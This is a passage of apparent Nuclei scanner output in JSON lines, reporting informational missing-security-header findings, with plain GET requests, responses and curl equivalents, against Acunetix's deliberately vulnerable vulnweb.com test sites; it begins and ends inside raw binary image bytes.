\\ufffd\\ufffdv\\ufffd\\ufffdH\\u0004\\u000b\\ufffd\\u0016y=,\\ufffd\\ufffd\\ufffd\\u0014\\ufffd\\\"x\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0005J\\ufffd\\u003c\\ufffd$\\ufffd\\u0004U^Dح\\ufffdכ\\u001dc\\ufffdc\\u001aK\\ufffd\\ufffdK_\\ufffd\\ufffd\\ufffd9^\\u0018\\ufffdW\\ufffdaZ\\ufffd]\\ufffd\\ufffdԶ’\\u0002\\ufffdT\\ufffd\\u0006(y\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\ufffd9c\\u001c\\u003c\\ufffd\\u0014\\ufffd\\ufffd\\ufffd,\\ufffdt\\ufffd\\ufffdY\\ufffd\\ufffd_o\\u0019\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7\\ufffd\\ufffdb\\ufffdT\\ufffd\\ufffdcma\\ufffd\\ufffdq\\ufffdY\\ufffd^\\u0017\\ufffd\\ufffdN#V+\\ufffdq\\ufffd.\\ufffdC\\\"\\ufffd\\ufffd\\ufffdL\\u0008\\ufffdM\\ufffd\\ufffd:\\u0002~\\ufffdk\\ufffd|\\ufffd}\\ufffdxA\\ufffd*\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffdY\\u00022\\ufffd*\\ufffd\\u0004\\n6\\ufffd\\ufffd\\u0001\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\u000e+\\ufffdI\\u001e\\ufffdT\\u0004\\u0006\\ufffd*\\ufffdt\\ufffd/8Xb\\ufffd\\ufffd\\u000c\\ufffdakr\\ufffd\\ufffdV4\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdCvp\\ufffd\\ufffd.W\\ufffd\\u0008\\u001a\\u0000\\ufffd\\r\\ufffd\\ufffd5F\\u0016\\ufffd7F\\ufffdo[\\ufffd\\u001d\\ufffd#\\ufffd\\ufffdw}1\\ufffd\\ufffdn\\u0010MHٛ\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffdL\\ufffd,\\u0000Z\\ufffd\\ufffd\\u0005\\u0014Esȫ\\u0007\\ufffd:x\\ufffdk\\ufffdU\\ufffd\\ufffdh\\ufffd~ߘ\\ufffd\\ufffd\\ufffd^*\\ufffd\\ufffd\\u0019\\ufffd\\ufffd8X\\ufffd\\ufffd\\ufffd|x4L:\\ufffdGa\\ufffd\\ufffd\\ufffd\\ufffd]Z\\ufffd\\u001b,jC9\\ufffd!\\ufffd\\u001e\\u0008\\ufffd\\ufffd\\ufffd\\ufffdŞVaL\\ufffd\\ufffd\\ufffdQg9~p\\u000c\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\u0019\\ufffd\\u001a\\ufffd\\ufffdl\\ufffdp\\ufffd\\u0018\\ufffd\\u0000Q\\ufffd\\u000c1'F\\u0018a\\ufffd$g\\u0018\\ufffd\\u0018c\\u0014\\ufffdu\\u001d\\ufffd\\ufffdo\\ufffd\\u0018bR\\ufffd\\ufffd\\ufffd\\u0018`\\ufffdF\\u0018a\\ufffd$a\\ufffd\\u0018\\ufffdFr\\ufffd\\u0018bF\\ufffda\\ufffd\\u0018(\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:38.070983344Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scripts/\\\"\\u003escripts/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:38.371302853Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:38.371289926Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:27 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"pmwiki_2_1_19/\\\"\\u003epmwiki_2_1_19/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:38.371296764Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:38.371368654Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:20 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , 